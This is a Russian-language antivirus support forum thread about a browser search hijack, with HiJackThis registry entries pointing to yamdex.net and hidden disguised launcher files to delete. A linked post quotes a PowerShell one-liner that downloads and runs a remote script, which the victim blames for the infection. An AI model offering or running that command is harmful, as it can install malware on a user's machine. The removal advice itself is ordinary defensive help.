Перейти к содержанию
Правила раздела

вирус

evgeniykas

От evgeniykas
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

thyrex Мудрец

thyrex

Опубликовано
Опубликовано

как удалить этот вирус который каждый раз востанавливается при его удаление

тогда о чем речь поясните

 

Да и ссылку на вирустотал, где что-то кто-то находит, увидеть не мешает

 

Пофиксите в hiJack

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text=
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text=

Удалите вручную (файлы скрытые)

C:\iехplоrе.bаt.exe
C:\lаunсhеr.bаt.exe
C:\Program Files (x86)\АrсLаunсhеr.bаt.exe
C:\Program Files (x86)\ArcLauncher.bat

 

 

  • Нет слов 1
Ссылка на комментарий
Поделиться на другие сайты
  • Ответов 40
  • Created
  • Последний ответ

Top Posters In This Topic

  • evgeniykas

    20

  • thyrex

    15

  • Roman_Five

    3

  • Friend

    2

Popular Days

Top Posters In This Topic

Popular Days

Popular Posts

evgeniykas
evgeniykas

ЕЩЕ РАЗ ГОВОРЮ ВАШ ГРЕБОНЫЙ АНТИВИРУС НЕ ЧЕГО НЕ НАХОДИТ ЗА ЧТО Я ЗАПЛАТИЛ ДЕНЬГИ 

thyrex
thyrex

тогда о чем речь поясните   Да и ссылку на вирустотал, где что-то кто-то находит, увидеть не мешает   Пофиксите в hiJack R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =

thyrex
thyrex

Список установленных расширений для браузеров напишите

Posted Images

evgeniykas Постоялец

evgeniykas

Опубликовано
  • Автор
Опубликовано

РЕЧЬ О ТОМ ЧТО АНТИВИРУС КАСПЕРСКОГО НЕ СПРАВЛЯЕТСЯ СО СВОЕЙ ЗАДАЧЕЙ  ПЛЮС Я СКИДЫВАЛ ФАЙЛ НО ВАШ МОДЕРАТОР ЕГО УДАЛИЛ 

ВОПРОС КАК ЭТО СДЕЛАТЬ Пофиксите в hiJack
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text=
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=5b6db1b3f85077b7303e695762539d65&text=

 

Строгое предупреждение от модератора Mark D. Pearlstone
Не пишите с Caps Lock.

Да вопрос зачем удалять эти файлы я проверил их на вирус тотал они чистые в них нечего нету


и вы так не ответили на мой вопрос


SHA256: 356f5d7dadc1adfad24140f8c456b52df4d2fdb62d5302119e09c884ad6c18c9

Ссылка на комментарий
Поделиться на другие сайты
Friend Корифей

Friend

Опубликовано
Опубликовано

Текст:

 

@thyrex, насколько я понял топикпастера, то он по своей ошибке заразился рекламными программами (в антивирусе по умолчанию детект отключен) , сейчас от которых вы его лечите.

 

@evgeniykas, не нужно быть таким голословным. У меня антивирус находит все. Нужно настраивать антивирус под себя.

По умолчанию от adware  программ антивирус не защищает, данную настройку нужно ставить вручную.

Вот статьи подробнее.

http://support.kaspersky.ru/viruses/solutions/10319
http://blog.kaspersky.ru/adware-toolbar/4733/
http://blog.kaspersky.ru/7-privychek-na-pu...internetu/2965/

P. S.  @thyrex, если текст не к месту, пожалуйста, удали.

 

 

Ссылка на комментарий
Поделиться на другие сайты
evgeniykas Постоялец

evgeniykas

Опубликовано
  • Автор
Опубликовано

Friend у меня все включено не надо уже из меня такого и дота делать я немного и разбираюсь в антивирусах

Roman_Five выкидывает ошибку Пофиксите

ошибка BEGIN expected в позиций 1:1

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

выкидывает ошибку Пофиксите ошибка BEGIN expected в позиций 1:1

Определенно, у Вас проблемы с чтением. Вас просили пофиксить, а это несколько ниже по ссылке 

 

Что касается информации с вирустотал - так там все по нулям, а не только антивирус от ЛК ))

 

 

 

Да вопрос зачем удалять эти файлы я проверил их на вирус тотал они чистые в них нечего нету

действительно, зачем вирус подменил запуск браузеров и английские буквы на латиницу в именах  файлов, которые я прошу удалить. Да еще и скрытыми их для чего-то сделали )
Ссылка на комментарий
Поделиться на другие сайты
evgeniykas Постоялец

evgeniykas

Опубликовано
  • Автор
Опубликовано

я так и сделал как написано ниже и выкидывает ошибку которую я написал выше я делал 3 раза как написано тоже самая ошибка выскакивает 

Ссылка на комментарий
Поделиться на другие сайты
evgeniykas Постоялец

evgeniykas

Опубликовано
  • Автор
Опубликовано

все как было стало еще хуже теперь удаляются папки сам по себе удались все браузеры 


вастонавливаю браузеры


и при перегрузке стал вообще не перегружать комп и выключаться его раньше такого не было сейчас вообще лог открылся сам по себе хоть я его не открывал реклама так и появляется в браузерах


да и звук куда то исчез

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Скачайте SITLog и сохраните архив с утилитой на Рабочем столе

Распакуйте архив с утилитой в отдельную папку

Запустите sitlog.exe

Обратите внимание
, что утилиты необходимо запускать от имени Администратора. По умолчанию в
Windows XP
так и есть. В
Windows Vista
и
Windows 7
администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
Запуск от имени Администратора
, при необходимости укажите пароль администратора и нажмите
Да


В главном окне программы выберите проверку за последние три месяца и нажмите "Старт"

По окончанию работы программы в папке LOG должны появиться два отчета SITLog.txt и SITLog_Info.txt

Заархивируйте эту папку и прикрепите в вашей теме.

Ссылка на комментарий
Поделиться на другие сайты
evgeniykas Постоялец

evgeniykas

Опубликовано
  • Автор
Опубликовано

ВОТ ЛОГИ КОТОРЫЕ ВЫ ПРОСИЛИ

 

Строгое предупреждение от модератора Roman_Five
Устное предупреждение за нарушение пп. 19 и 22 форума.

ЛОГИ.zip

Ссылка на комментарий
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
 Share
Перейти к списку тем

  • Похожий контент

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      Вирус dialer.exe
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      Поймал какой-то вирус
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      Вирус в PowerShell
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...